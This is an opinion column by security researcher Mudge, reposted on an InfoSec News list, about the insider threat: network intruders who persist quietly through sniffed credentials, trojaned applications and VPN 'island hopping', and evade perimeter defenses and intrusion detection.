[ISN] Inside the insider threat

[InfoSec News]

http://www.computerworld.com/securitytopics/security/story/0,,93757,00.html

Opinion by Mudge
Intrusic Inc. 
JUNE 10, 2004

Six years ago, I warned the U.S. Senate that it was possible to "take
down the Internet in 30 minutes."

There are still critical weaknesses in central points of the public
network. Although more distributed now, remote points can still be
harnessed to cause disruption and confusion in ways similar to
distributed denial-of-service attacks (DDoS). These methods refer to a
threat model embodied by the collective Internet. An Internetwide
outage would affect everyone on the Web, but corporations,
organizations and governments face even greater threat models that
encompass much more acute localized pain and risk.

One of the oldest and least modified over the years has been the
insider threat -- hackers infiltrating internal networks. This threat
is more common than insider attacks or destruction. The infiltration
is achieved in various ways common to network interlopers and
attackers, and most importantly, it is largely missed by existing
audit and intrusion-detection systems (IDS).

Web site defacement, concurrent versions system (CVS) attacks and DDoS
attacks are rarely instigated by agents once they get inside an
organization. Such overt attacks too easily reveal them. Once inside a
network, a hacker's priorities change -- from vandal to spy.

The insider threat is unaddressed by today's IDSs, which are focused
on attacks. Attacks are noisy, so they're rarely used by insiders
intent on remaining invisible inside of a network. Real-world examples
of insiders include Robert Hanssen, the FBI mole; Aldrich Ames, the
CIA mole; and the sleeper terrorist cells inside the U.S. that were
responsible for 9/11. How many lives could have been saved if these
moles and sleeper cells had been discovered earlier?

Over the years, I have found critical systems, such as Supervisory
Control and Data Acquisition/Data Control System components for
utilities companies and large phone-switching systems for
telecommunications companies, compromised by insiders who were camping
out in these networks. Often, the system's critical function was
unknown to the interloper, whose sights were set elsewhere. But many
times control of the critical system was the ultimate goal.

Proprietary source code, microchip design plans and databases full of
personal information continue to become public, or competitor, domain.  
Companies and organizations of all shapes and sizes continue to bear
this risk with little mitigation coming from the expensive network
security defenses they have deployed.

So how do antagonists continue to gain access so easily?

Let's take a closer look at some of the tactics hackers commonly use.


Sniffing, Trojan horses and application back doors

Sniffing is the easiest and most profitable method hackers use to
obtain the legitimate credentials and account information needed to
gain access to an internal network. The act of sniffing refers to
placing a system into promiscuous mode, in which network devices
intercept and read each packet in its entirety. So the network will
capture not only packets destined for that system, but also packets
being exchanged among different systems. All information that passes
along the network line while in promiscuous mode is captured,
including usernames and passwords.

Universities and network service providers are prime targets for the
harvesting of accounts and credentials to access the internal networks
of corporations because they have high-speed network connections that
carry substantial amounts of traffic for a multitude of purposes.

Hackers on the inside use a standard set of techniques to maintain
invisibility on compromised systems. These techniques alter or replace
applications, library calls, kernel interfaces, etc. so as not to show
files, processes and other systems information that might tip off the
company that its network is compromised (and that someone is most
likely sniffing the local network interfaces).

Encryption and communication applications are often modified by
perpetrators to copy input and output from the controlling terminal
into hidden sections on the system. Variants of these modifications
send the copied data out over the network using covert data channels.  
So while the secure-encrypted communications of the session itself
might have been protected, the modified endpoint application happily
stored the correct information for later retrieval and reuse.

The longer a hacker has control, the more options he has and the more
value he receives. The hacker Fluffy Bunny, for example, was
tremendously successful using these techniques and would then go
public with some of the names and locations of places to which he had
gained access and control. (It's a shame that most people didn't read
the detailed descriptions provided around how the compromises were
conducted.)

Once legitimate credentials are obtained, the need to overtly attack
is negated. No wonder vulnerability scanners and network IDSs do
little to thwart this inside corporate networks. Who would want to
deploy a system that stopped access to systems when legitimate
credentials are presented? Don't forget that it's very likely any
attacks or exploits used in compromising the first sniffing system
happened outside of the network.

Here is a real-world example of what an insider compromise can yield
in one day of using a small sniffer/Trojan-horse log file placed on
the back door of an Internet service provider that will remain
anonymous: 4,466 username/password pairs for roughly 1,000 remote
organizations -- 104 root accounts -- one of which was a master
password for the IT organization of a global company. (Out of the
thousands, perhaps only 20 of these accounts related to the service
provider itself.)

Another method is "island hopping." This approach targets broadband,
Digital Subscriber Line and dial-up-connected PCs to take advantage of
virtual private network connections to gain legitimate access to
internal networks remotely accessed from home systems. There are many
other ways for hackers to infiltrate networks without alerting
firewalls and IDSs.

Attackers have many ways of getting inside corporate networks. The
insider threat has become an enormous danger to the internal networks
of corporations, organizations and governments. To properly address
this threat, organizations need to move beyond traditional
perimeter-security systems.


In an upcoming column, Mudge will explore options for companies to
combat the insider threat.


Peiter Mudge Zatko is a security expert and chief scientist at
Waltham, Mass.-based Intrusic Inc., which is a security company
focused exclusively on the insider threat.